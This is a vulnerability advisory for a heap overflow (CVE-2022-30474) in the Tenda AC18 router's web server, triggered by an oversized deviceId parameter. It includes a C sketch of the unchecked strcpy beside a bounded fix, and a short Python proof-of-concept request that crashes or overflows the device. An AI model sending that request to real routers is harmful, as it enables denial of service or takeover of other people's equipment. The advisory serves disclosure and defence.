CVE-2022-30474: VulnRepo/IoT/Tenda/5 at master · lcyfrank/VulnRepo
Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a heap overflow in the httpd module when handling /goform/saveParentControlInfo request.
Tenda Router AC18 Vulnerability
This vulnerability lies in the /goform/saveParentControlInfo page and affects the latest version of the Tenda Router AC18. (The latest version is AC18_V15.03.05.19(6318).)
Vulnerability Description
There is a heap overflow vulnerability in function saveParentControlInfo.
In function saveParentControlInfo, the user-provided parameter deviceId is read into src, and src is passed to strcpy without any length check, which may overflow the heap-based buffer ptr.
So by requesting the page /goform/saveParentControlInfo, an attacker can easily perform a Denial of Service attack or Remote Code Execution with carefully crafted overflow data.
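The unchecked copy described above, next to a bounded form that rejects an oversized deviceId. This is an added illustration, not the firmware's code: the record layout, DEVICE_ID_MAX and all function names are assumptions, and only the names ptr, src and deviceId come from the description.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEVICE_ID_MAX 32            /* assumed; the real buffer size is not on the page */

struct parent_rule {                /* hypothetical heap record */
    char device_id[DEVICE_ID_MAX];
    int  enabled;
};

/* Pattern from the description: src is copied with no length check. */
int save_unchecked(struct parent_rule *ptr, const char *src) {
    strcpy(ptr->device_id, src);    /* writes past device_id when src is too long */
    return 0;
}

/* Hardened form: look for the terminator inside the limit, reject otherwise. */
int save_checked(struct parent_rule *ptr, const char *src) {
    if (ptr == NULL || src == NULL)
        return -1;
    const char *nul = memchr(src, '\0', DEVICE_ID_MAX);
    if (nul == NULL)                /* deviceId does not fit: refuse, do not truncate */
        return -1;
    memcpy(ptr->device_id, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Constructed input: a deviceId of len bytes. 0 = stored, 1 = rejected, -1 = error. */
int demo(size_t len) {
    struct parent_rule *ptr = calloc(1, sizeof *ptr);
    char *src = malloc(len + 1);
    int out = -1;
    if (ptr != NULL && src != NULL) {
        memset(src, 's', len);
        src[len] = '\0';
        ptr->enabled = 1;           /* neighbouring field must survive the call */
        if (save_checked(ptr, src) == 0)
            out = (strlen(ptr->device_id) == len && ptr->enabled == 1) ? 0 : -1;
        else
            out = (ptr->device_id[0] == '\0' && ptr->enabled == 1) ? 1 : -1;
    }
    free(ptr); free(src);
    return out;
}

int main(void) {
    printf("17 bytes: %d, 0x1000 bytes: %d\n", demo(17), demo(0x1000));
    return 0;
}
```

Rejecting rather than truncating keeps a stored deviceId from silently differing from the one the client sent.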
PoC
import requests

IP = "10.10.10.1"
url = f"http://{IP}/goform/saveParentControlInfo?"
url += "deviceId=" + "s" * 0x1000
response = requests.get(url)
Timeline
- 2022-05-07: Reported to CVE & CNVD
- 2022-05-26: CVE ID assigned (CVE-2022-30474)
Acknowledgement
Credit to @peanuts and @cylin from IIE, CAS.